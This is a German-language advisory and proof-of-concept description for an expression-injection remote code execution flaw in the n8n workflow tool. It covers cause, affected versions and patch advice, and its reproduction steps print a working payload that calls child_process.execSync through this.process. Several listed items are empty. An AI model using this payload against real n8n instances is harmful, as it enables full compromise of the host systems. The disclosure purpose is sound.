
Proof-of-concept-Exploit für eine kritische RCE-Schwachstelle in n8n (CVE-2025-68613), der die Ausführung beliebiger Befehle durch Ausdrucksinjektion in Workflow-Knoten demonstriert.
Sicherheitshinweis: Kritische Sicherheitslücke zur Remote-Code-Ausführung in n8n (CVE-2025-68613)
Eine kritische Sicherheitslücke wurde im Workflow-Automatisierungstool n8n identifiziert, die die Ausführung beliebigen Codes ermöglicht. Authentifizierte Benutzer mit Berechtigungen zum Erstellen oder Bearbeiten von Workflows können diese Schwachstelle ausnutzen, um die Kontrolle über das System zu erlangen, auf dem die n8n-Instanz läuft. Zusammenfassung
CVE ID CVE-2025-68613 Sicherheitslücke Unzureichende Kontrolle dynamisch verwalteter Coderessourcen Schweregrad Kritisch Auswirkung Ausführung beliebiger Befehle, vollständige Systemkompromittierung Ursache Der Ausdrucks-Evaluator säubert den Zugriff auf das zugrunde liegende Node.js-Prozessobjekt (this.process) nicht, sodass ein Angreifer Systemmodule wie child_process anfordern und verwenden kann. Auswirkung
Ein Angreifer, der diese Sicherheitslücke erfolgreich ausnutzt, kann Folgendes erreichen:
Betroffene und gepatchte Versionen Status Version(en) Anfällig Alle Versionen vor 1.122.0 Gepatcht Version 1.122.0 und später Abhilfe
Es ist entscheidend, Ihre n8n-Instanz sofort auf Version 1.122.0 oder höher zu aktualisieren, um diese Sicherheitslücke zu beheben.
Exploit-Details für CVE-2025-68613
Dieses Verzeichnis enthält einen Proof-of-Concept für die Sicherheitslücke zur Remote-Code-Ausführung (RCE) in n8n (CVE-2025-68613). Voraussetzungen
Schritte zur Reproduktion
Workflow erstellen:
Knoten hinzufügen:
Set-Knoten konfigurieren:
Exploit-Payload einfügen:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Ausführen und überprüfen:
